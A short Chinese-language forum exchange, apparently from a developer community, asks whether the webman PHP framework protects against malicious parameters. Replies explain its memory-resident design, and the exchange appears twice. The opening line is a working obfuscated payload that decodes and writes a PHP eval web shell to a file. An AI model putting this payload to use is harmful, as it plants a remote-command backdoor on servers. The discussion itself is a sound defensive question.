id='-("fil"."e"._."pu"."t"._."contents")("./test1.php",("base"."64"._."decode")('PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4='),FILE_APPEND)-'
比如有人恶意给一个参数传参这种webman有做处理嘛
webman 启动了就不会再次解析php文件程序常驻了。你的数据库操作采用ORM的SQL注入大多数拦截了。没事叫你们老板买好点服务器,阿里云免费的支持木马文件扫描和隔离的。就算你的文件上传到服务器了,阿里云这边隔离了。
哎,ZF项目用不了这些厂商的,orm我是用了的,老框架存被攻击队弄出了远程上传,新框架打算采用webman
webman是常驻内存的,即使用户直接通过url访问上传的php文件也无法运行,这个机制比php-fpm更安全。
嗯 就是看中这个安全性
上面的参数传递到webman后只是一个字符串,并不会执行,没有危险。
okok感谢解答
webman 启动了就不会再次解析php文件程序常驻了。你的数据库操作采用ORM的SQL注入大多数拦截了。没事叫你们老板买好点服务器,阿里云免费的支持木马文件扫描和隔离的。就算你的文件上传到服务器了,阿里云这边隔离了。
哎,ZF项目用不了这些厂商的,orm我是用了的,老框架存被攻击队弄出了远程上传,新框架打算采用webman
webman是常驻内存的,即使用户直接通过url访问上传的php文件也无法运行,这个机制比php-fpm更安全。
嗯 就是看中这个安全性
上面的参数传递到webman后只是一个字符串,并不会执行,没有危险。
okok感谢解答